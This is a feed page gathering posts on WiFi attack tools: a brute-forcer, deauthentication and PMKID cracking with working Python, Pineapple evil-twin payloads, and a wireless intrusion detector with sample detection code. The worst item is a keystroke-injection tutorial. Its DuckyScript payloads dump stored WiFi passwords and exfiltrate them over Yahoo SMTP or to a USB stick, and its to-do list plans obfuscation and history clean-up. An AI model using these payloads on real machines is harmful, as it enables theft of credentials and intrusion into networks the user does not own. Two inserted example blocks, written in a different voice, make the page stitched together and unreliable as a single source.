FreshRSS


WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

By: Zion3R


WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script, which uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack, but it needs no external libraries, just Python and Python scripts.


Installation

The packages are minimal or nearly none 😅. The package install command is:

pip install rich pyfiglet

That's it.


Features

So listing the features:

  • Overall Features:
    • We can use custom interfaces or non-default interfaces to run the attack.
    • Well-defined way of using netsh and listing and utilizing targets.
    • Upgradeability
  • Code-Wise Features:
    • Interactive menu-driven system with rich.
    • Versatility in using interface, targets, and password files.

How it works

So this is how the bruteforcer works:

  • Provide Interface:
    • The user is required to provide the network interface for the tool to use.
    • By default, the interface is set to Wi-Fi.
  • Search and Set Target:
    • The user must search for and select the target network.
    • During this process, the tool performs the following sub-steps:
      • Disconnects all active network connections for the selected interface.
      • Searches for all available networks within range.
  • Input Password File:
    • The user inputs the path to the password file.
    • The default path for the password file is ./wordlist/default.txt.
  • Run the Attack:
    • With the target set and the password file ready, the tool is now prepared to initiate the attack.
  • Attack Procedure:
    • The attack involves iterating through each password in the provided file.
    • For each password, the following steps are taken:
      • A custom XML configuration for the connection attempt is generated and stored.
      • The tool attempts to connect to the target network using the generated XML and the current password.
      • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
      • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
      • This loop continues until a successful ping response is received, indicating a successful connection attempt.

How to run this

After installing all the packages, just run python main.py and the rest is history 👍. Make sure you run this on Windows, because this won't work on any other OS. The interface looks like this:


Contributions

For contributions:

  • First Clone: First clone the repo into your dev env and do the edits.
  • Comments: I would appreciate if you could add comments explaining your POV and also explaining the upgrade.
  • Submit: Submit a PR for me to verify the changes and approve it if necessary.



Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

Requirements

This software only works on Linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any question about the usage of the application, do not hesitate to open a discussion.

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request.



Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac and pmkid must be hex strings, e.g. b8621f50edd9

How PMKID is Calculated

The two main formulas used to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) calculation: PMK = PBKDF2(HMAC-SHA1, passphrase, salt = SSID, 4096 iterations)
  2. PMKID calculation: PMKID = HMAC-SHA1(key = PMK, data = "PMK Name" + bssid + clientmac)

This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
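The two formulas carried through in working code, as an added example that is not pmkidcracker's own implementation (its find_pw_chunk and calculate_pmkid are not reproduced here). It follows the 802.11 definition, in which the PMKID is the first 128 bits of the HMAC-SHA1 output, a truncation the short formula above leaves implicit. The SSID, MAC addresses and passphrase are constructed values: the sample PMKID is derived from a known passphrase to stand in for one you captured from your own access point, so the check demonstrates why a PMKID that leaks in EAPOL message 1 turns passphrase strength into the only remaining defence.

```python
import hashlib
import hmac


def _mac_bytes(mac: str) -> bytes:
    """Accept 'b8621f50edd9' or 'b8:62:1f:50:ed:d9' and return the 6 raw bytes."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError(f"MAC address must be 6 bytes: {mac!r}")
    return raw


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Formula 1: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256-bit key)."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, dklen=32
    )


def pmkid_from_pmk(pmk: bytes, ap_mac: str, client_mac: str) -> bytes:
    """Formula 2: PMKID = HMAC-SHA1(key=PMK, data="PMK Name" || AP MAC || client MAC), first 128 bits."""
    data = b"PMK Name" + _mac_bytes(ap_mac) + _mac_bytes(client_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def pmkid_matches(passphrase: str, ssid: str, ap_mac: str, client_mac: str,
                  captured_pmkid_hex: str) -> bool:
    """True when `passphrase` reproduces the PMKID seen in EAPOL message 1."""
    candidate = pmkid_from_pmk(derive_pmk(passphrase, ssid), ap_mac, client_mac)
    return hmac.compare_digest(candidate, bytes.fromhex(captured_pmkid_hex))


# Constructed sample inputs (hypothetical network; not a real capture).
SSID = "TestNet"
AP_MAC = "b8621f50edd9"
CLIENT_MAC = "00:11:22:33:44:55"
# A PMKID built from a known passphrase stands in for one captured from your own AP.
SAMPLE_PMKID = pmkid_from_pmk(
    derive_pmk("correct horse battery staple", SSID), AP_MAC, CLIENT_MAC
).hex()

if __name__ == "__main__":
    print("correct passphrase:", pmkid_matches("correct horse battery staple", SSID, AP_MAC, CLIENT_MAC, SAMPLE_PMKID))
    print("wrong passphrase:  ", pmkid_matches("password123", SSID, AP_MAC, CLIENT_MAC, SAMPLE_PMKID))
```

Each candidate check costs a full 4096-iteration PBKDF2 run, which is the only expensive step; the HMAC that produces the PMKID is negligible by comparison. That cost is fixed by the standard, so a passphrase that is long and not in any wordlist is what keeps a leaked PMKID from being useful.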

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark.

*You may use hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from Wireshark, put your wireless interface in monitor mode and start capturing all packets with airodump-ng or a similar tool. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in Wireshark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to display only EAPOL message 1 packets.
  • In the EAPOL 1 packet, expand IEEE 802.11 QoS Data Field to obtain the AP MAC and Client MAC.
  • In the EAPOL 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific; the PMKID is below.

If the access point is vulnerable, you should see the PMKID value like in the screenshot below:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. ENTER/SPACE simulate a press of those keyboard keys.

Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is especially useful at the very beginning, when a new USB device is connected to a targeted computer: the computer must first complete a set of actions before it can begin accepting input commands. In the case of HIDs, setup time is very short. In most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use an SMTP server from another email provider, but you should be mindful of the SMTP server and port number you write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. The keyfile plugin stores network configuration profiles in an .ini-style keyfile format and supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex in order to extract the data of interest. For file filtering, a positive lookbehind assertion was used ((?<=keyword)). The positive lookbehind assertion matches at a certain position in the string, that is, at the position right after the keyword, without making that text itself part of the match, so the regex (?<=keyword).* matches any text after the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees is a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


WiFi-Pineapple-MK7_REST-Client - WiFi Hacking Workflow With WiFi Pineapple Mark VII API

By: Zion3R


PINEAPPLE MARK VII REST CLIENT

Author:: TW-D

Version:: 1.3.7

Copyright:: Copyright (c) 2022 TW-D

License:: Distributes under the same terms as Ruby

Doc:: https://hak5.github.io/mk7-docs/docs/rest/rest/

Requires:: Ruby >= 2.7.0p0 and Pineapple Mark VII >= 2.1.0-stable

Installation (Debian, Ubuntu, Raspbian)::

  • sudo apt-get install build-essential curl g++ ruby ruby-dev

  • sudo gem install net-ssh rest-client tty-progressbar

Description

Library allowing the automation of active or passive attack operations.

Note : "Issues" and "Pull Request" are welcome.


Payloads

In the "./payloads/" directory, you will find:

COMMAND and CONTROL (author: TW-D)
  • Hak5 Key Croc - Real-time recovery of keystrokes from a keyboard: ruby ./hak5_key-croc.rb
  • Maltronics WiFi Deauther - Spam beacon frames: ruby ./maltronics_wifi-deauther.rb

DEFENSE (author: TW-D, with special thanks to @DrSKiZZ, @cribb-it, @barry99705 and @dark_pyrro)
  • Hak5 Pineapple Spotter: ruby ./hak5-pineapple_spotter.rb

DoS (author: TW-D)
  • Deauthentication of clients available on the access points: ruby ./deauthentication-clients.rb

EXPLOITATION (author: TW-D)
  • Evil WPA Access Point: ruby ./evil-wpa_access-point.rb
  • Fake Access Points: ruby ./fake_access-points.rb
  • Mass Handshakes: ruby ./mass-handshakes.rb
  • Rogue Access Points: ruby ./rogue_access-points.rb
  • Twin Access Points: ruby ./twin_access-points.rb

GENERAL (author: TW-D)
  • System Status, Disk Usage, ...: ruby ./dashboard-stats.rb
  • Networking Interfaces: ruby ./networking-interfaces.rb
  • System Logs: ruby ./system-logs.rb

RECON (author: TW-D)
  • Access Points and Clients on 2.4GHz and 5GHz (with a supported adapter): ruby ./access-points_clients_5ghz.rb
  • Access Points and Clients: ruby ./access-points_clients.rb
  • MAC Addresses of Access Points: ruby ./access-points_mac-addresses.rb
  • Tagged Parameters of Access Points: ruby ./access-points_tagged-parameters.rb
  • Access Points and Wireless Network Mapping with WiGLE: ruby ./access-points_wigle.rb
  • MAC Addresses of Clients: ruby ./clients_mac-addresses.rb
  • OPEN Access Points: ruby ./open_access-points.rb
  • WEP Access Points: ruby ./wep_access-points.rb
  • WPA Access Points: ruby ./wpa_access-points.rb
  • WPA2 Access Points: ruby ./wpa2_access-points.rb
  • WPA3 Access Points: ruby ./wpa3_access-points.rb

WARDRIVING (author: TW-D)
  • Continuous Recon on 2.4GHz and 5GHz (with a supported adapter): ruby ./continuous-recon_5ghz.rb [CTRL+c]
  • Continuous Recon for Handshakes Capture: ruby ./continuous-recon_handshakes.rb [CTRL+c]
  • Continuous Recon: ruby ./continuous-recon.rb [CTRL+c]

Payload skeleton for development

#
# Title: <TITLE>
#
# Description: <DESCRIPTION>
#
#
# Author: <AUTHOR>
# Version: <VERSION>
# Category: <CATEGORY>
#
# STATUS
# ======================
# <SHORT-DESCRIPTION> ... SETUP
# <SHORT-DESCRIPTION> ... ATTACK
# <SHORT-DESCRIPTION> ... SPECIAL
# <SHORT-DESCRIPTION> ... FINISH
# <SHORT-DESCRIPTION> ... CLEANUP
# <SHORT-DESCRIPTION> ... OFF
#

require_relative('<PATH-TO>/classes/PineappleMK7.rb')

system_authentication = PineappleMK7::System::Authentication.new
system_authentication.host = "<PINEAPPLE-IP-ADDRESS>"
system_authentication.port = 1471
system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>"
system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>"

if (system_authentication.login)

  led = PineappleMK7::System::LED.new

  # SETUP
  #
  led.setup

  #
  # [...]
  #

  # ATTACK
  #
  led.attack

  #
  # [...]
  #

  # SPECIAL
  #
  led.special

  #
  # [...]
  #

  # FINISH
  #
  led.finish

  #
  # [...]
  #

  # CLEANUP
  #
  led.cleanup

  #
  # [...]
  #

  # OFF
  #
  led.off

end

Note : Don't hesitate to take inspiration from the payloads directory.

System modules

Authentication accessors/method

system_authentication = PineappleMK7::System::Authentication.new

system_authentication.host = (string) "<PINEAPPLE-IP-ADDRESS>"
system_authentication.port = (integer) 1471
system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>"
system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>"

system_authentication.login()

LED methods

led = PineappleMK7::System::LED.new

led.setup()
led.failed()
led.attack()
led.special()
led.cleanup()
led.finish()
led.off()

Pineapple Modules

Dashboard

Notifications method

dashboard_notifications = PineappleMK7::Modules::Dashboard::Notifications.new

dashboard_notifications.clear()

Stats method

dashboard_stats = PineappleMK7::Modules::Dashboard::Stats.new

dashboard_stats.output()

Logging

System method

logging_system = PineappleMK7::Modules::Logging::System.new

logging_system.output()

PineAP

Clients methods

pineap_clients = PineappleMK7::Modules::PineAP::Clients.new

pineap_clients.connected_clients()
pineap_clients.previous_clients()
pineap_clients.kick( (string) mac )
pineap_clients.clear_previous()

EvilWPA accessors/method

evil_wpa = PineappleMK7::Modules::PineAP::EvilWPA.new

evil_wpa.ssid = (string default:'PineAP_WPA')
evil_wpa.bssid = (string default:'00:13:37:BE:EF:00')
evil_wpa.auth = (string default:'psk2+ccmp')
evil_wpa.password = (string default:'pineapplesareyummy')
evil_wpa.hidden = (boolean default:false)
evil_wpa.enabled = (boolean default:false)
evil_wpa.capture_handshakes = (boolean default:false)

evil_wpa.save()

Filtering methods

pineap_filtering = PineappleMK7::Modules::PineAP::Filtering.new

pineap_filtering.client_filter( (string) 'allow' | 'deny' )
pineap_filtering.add_client( (string) mac )
pineap_filtering.clear_clients()
pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )

Impersonation methods

pineap_impersonation = PineappleMK7::Modules::PineAP::Impersonation.new

pineap_impersonation.output()
pineap_impersonation.add_ssid( (string) ssid )
pineap_impersonation.clear_pool()

OpenAP method

open_ap = PineappleMK7::Modules::PineAP::OpenAP.new

open_ap.output()

Settings accessors/method

pineap_settings = PineappleMK7::Modules::PineAP::Settings.new

pineap_settings.enablePineAP = (boolean default:true)
pineap_settings.autostartPineAP = (boolean default:true)
pineap_settings.armedPineAP = (boolean default:false)
pineap_settings.ap_channel = (string default:'11')
pineap_settings.karma = (boolean default:false)
pineap_settings.logging = (boolean default:false)
pineap_settings.connect_notifications = (boolean default:false)
pineap_settings.disconnect_notifications = (boolean default:false)
pineap_settings.capture_ssids = (boolean default:false)
pineap_settings.beacon_responses = (boolean default:false)
pineap_settings.broadcast_ssid_pool = (boolean default:false)
pineap_settings.broadcast_ssid_pool_random = (boolean default:false)
pineap_settings.pineap_mac = (string default:system_authentication.mac)
pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF')
pineap_settings.beacon_response_interval = (string default:'NORMAL')
pineap_settings.beacon_interval = (string default:'NORMAL')

pineap_settings.save()

Recon

Handshakes methods

recon_handshakes = PineappleMK7::Modules::Recon::Handshakes.new

recon_handshakes.start( (object) ap )
recon_handshakes.stop()
recon_handshakes.output()
recon_handshakes.download( (object) handshake, (string) destination )
recon_handshakes.clear()

Scanning methods

recon_scanning = PineappleMK7::Modules::Recon::Scanning.new

recon_scanning.start( (integer) scan_time )
recon_scanning.start_continuous( (boolean) autoHandshake )
recon_scanning.stop_continuous()
recon_scanning.output( (integer) scanID )
recon_scanning.tags( (object) ap )
recon_scanning.deauth_ap( (object) ap )
recon_scanning.delete( (integer) scanID )

Settings

Networking methods

settings_networking = PineappleMK7::Modules::Settings::Networking.new

settings_networking.interfaces()
settings_networking.client_scan( (string) interface )
settings_networking.client_connect( (object) network, (string) interface )
settings_networking.client_disconnect( (string) interface )
settings_networking.recon_interface( (string) interface )


Pinacolada - Wireless Intrusion Detection System For Hak5's WiFi Coconut


Pinacolada looks for typical IEEE 802.11 attacks and then informs you about them as quickly as possible. All this with the help of Hak5's WiFi Coconut, which allows it to listen for threats on all 14 channels in the 2.4GHz range simultaneously.


Supported 802.11 Attacks

Attack | Type
Deauthentication | DoS
Disassociation | DoS
Authentication | DoS
EvilTwin | MiTM
KARMA | MiTM
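How a detector for the attack types listed above can be structured, as an added example that is not Pinacolada's own code and does not read from a WiFi Coconut. The Frame records are a constructed, simplified view of 802.11 management frames (timestamp, subtype, addresses, SSID); the thresholds, window length and the KNOWN_APS inventory are assumptions you would tune for your own environment. Deauthentication, disassociation and authentication floods are caught by a sliding-window count per transmitter; an evil twin is a beacon or probe response for one of your SSIDs from a BSSID that is not yours; KARMA behaviour shows up as one BSSID answering probe responses for many unrelated SSIDs.

```python
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float       # capture timestamp in seconds
    subtype: str    # "deauth", "disassoc", "auth", "beacon" or "probe_resp"
    src: str        # transmitter address (the BSSID for AP-originated frames)
    dst: str        # receiver address
    ssid: str = ""  # only meaningful for beacon / probe_resp frames


def detect_floods(frames, subtype, threshold=30, window=2.0):
    """Flag a transmitter that sends `threshold` or more frames of `subtype`
    within any `window`-second span (deauthentication/disassociation/authentication DoS)."""
    recent = defaultdict(deque)   # src -> timestamps still inside the window
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype != subtype:
            continue
        q = recent[f.src]
        q.append(f.ts)
        while f.ts - q[0] > window:   # evict timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and f.src not in alerted:
            alerted.add(f.src)        # one alert per offending transmitter
            alerts.append((f"{subtype} flood", f.src, round(f.ts, 3)))
    return alerts


def detect_evil_twin(frames, known_aps):
    """known_aps maps each SSID you own to the set of BSSIDs allowed to announce it.
    A beacon or probe response for one of those SSIDs from any other BSSID is an evil twin."""
    seen = set()
    alerts = []
    for f in frames:
        if f.subtype not in ("beacon", "probe_resp") or f.ssid not in known_aps:
            continue
        if f.src not in known_aps[f.ssid] and (f.ssid, f.src) not in seen:
            seen.add((f.ssid, f.src))
            alerts.append(("evil twin", f.ssid, f.src))
    return alerts


def detect_karma(frames, max_ssids=3):
    """A KARMA-style AP answers probe requests for whatever SSID a client asks for,
    so a single BSSID ends up sending probe responses for many unrelated SSIDs."""
    ssids = defaultdict(set)
    for f in frames:
        if f.subtype == "probe_resp":
            ssids[f.src].add(f.ssid)
    return [("karma", bssid, len(names)) for bssid, names in ssids.items() if len(names) > max_ssids]


def run_all(frames, known_aps):
    """Every alert the three detectors raise for one batch of frames."""
    return (detect_floods(frames, "deauth") + detect_floods(frames, "disassoc")
            + detect_floods(frames, "auth") + detect_evil_twin(frames, known_aps)
            + detect_karma(frames))


# Constructed sample traffic (hypothetical addresses): a legitimate AP beaconing,
# a rogue AP cloning its SSID and answering probes for anything, and a deauth flood.
LEGIT_AP = "aa:bb:cc:00:00:01"
ROGUE_AP = "de:ad:be:ef:00:01"
ATTACKER = "00:11:22:33:44:55"
BROADCAST = "ff:ff:ff:ff:ff:ff"
KNOWN_APS = {"CorpWiFi": {LEGIT_AP}}

SAMPLE_FRAMES = (
    [Frame(0.1 * i, "beacon", LEGIT_AP, BROADCAST, "CorpWiFi") for i in range(10)]
    + [Frame(0.5, "beacon", ROGUE_AP, BROADCAST, "CorpWiFi")]
    + [Frame(1.0 + 0.01 * i, "deauth", ATTACKER, BROADCAST) for i in range(40)]
    + [Frame(2.0 + 0.2 * i, "probe_resp", ROGUE_AP, "11:22:33:44:55:66", name)
       for i, name in enumerate(["CorpWiFi", "HomeNet", "CoffeeShop", "Airport_Free", "Hotel_Guest"])]
)

if __name__ == "__main__":
    for alert in run_all(SAMPLE_FRAMES, KNOWN_APS):
        print(alert)
```

The flood detector sorts by timestamp so it also works on frames merged from several channels, which is the situation with a multi-radio capture like the Coconut's. Thresholds are the part that needs care: a busy AP legitimately sends a handful of deauthentication frames when it reboots or evicts idle clients, so alert on the rate, not on the mere presence of the frame type.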

Dependencies

MacOS (With PIP/Python and Homebrew package manager)

pip install flask
brew install wireshark

Linux (With PIP/Python and APT package manager)

pip install flask
apt install tshark

For both operating systems install the WiFi Coconut's userspace

Installation

# Download Pinacolada
git clone https://github.com/90N45-d3v/Pinacolada
cd Pinacolada

# Start Pinacolada
python main.py

Usage

Pinacolada will be accessible from your browser at 127.0.0.1:8888.
The default password is CoconutsAreYummy.
After you have logged in, you can see a dashboard on the start page and you should change the password in the settings tab.

E-Mail Notifications

If configured, Pinacolada will alert you to attacks via E-Mail. In order to send you an E-Mail, however, an E-Mail account for Pinacolada must be specified in the settings tab. To find the necessary information such as SMTP server and SMTP port, search the internet for your mail provider and how their SMTP servers are configured and how to use them. Here is some information about known providers:

Provider SMTP Server SMTP Port (TLS)
Gmail smtp.gmail.com 587
Outlook smtp.office365.com 587
GoDaddy smtpout.secureserver.net 587

Not fully tested!

Since I don't own a WiFi Coconut myself, I have to simulate its traffic. So if you encounter any problems, don't hesitate to contact me and open an issue.



New Wi-Fi Protocol Security Flaw Affecting Linux, Android and iOS Devices

A group of academics from Northeastern University and KU Leuven has disclosed a fundamental design flaw in the IEEE 802.11 Wi-Fi protocol standard, impacting a wide range of devices running Linux, FreeBSD, Android, and iOS. Successful exploitation of the shortcoming could be abused to hijack TCP connections or intercept client and web traffic, researchers Domien Schepers, Aanjhan Ranganathan,

Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database


Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and their probes, WPS information and a global view of all the APs seen.

wifi_db by r4ulcl

Features

  • Displays if a network is cloaked (hidden) even if you have the ESSID.
  • Shows a detailed table of connected clients and their respective APs.
  • Identifies client probes connected to APs, providing insight into potential security risks using Rogue APs.
  • Extracts handshakes for use with hashcat, facilitating password cracking.
  • Displays identity information from enterprise networks, including the EAP method used for authentication.
  • Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
  • Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
  • Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
  • Upload files with capture folder or file. This option supports the use of wildcards (*) to select multiple files or folders.
  • Docker version in Docker Hub to avoid dependencies.
  • Obfuscated mode for demonstrations and conferences.
  • Possibility to add static GPS data.

Install

From DockerHub (RECOMMENDED)

docker pull r4ulcl/wifi_db

Manual installation

Debian based systems (Ubuntu, Kali, Parrot, etc.)

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools

sudo apt install tshark
sudo apt install python3 python3-pip

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Arch

Dependencies:

  • python3
  • python3-pip
  • tshark
  • hcxtools

sudo pacman -S wireshark-qt
sudo pacman -S python-pip python

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
cd ..

Installation

git clone https://github.com/r4ulcl/wifi_db
cd wifi_db
pip3 install -r requirements.txt

Usage

Scan with airodump-ng

Run airodump-ng saving the output with -w:

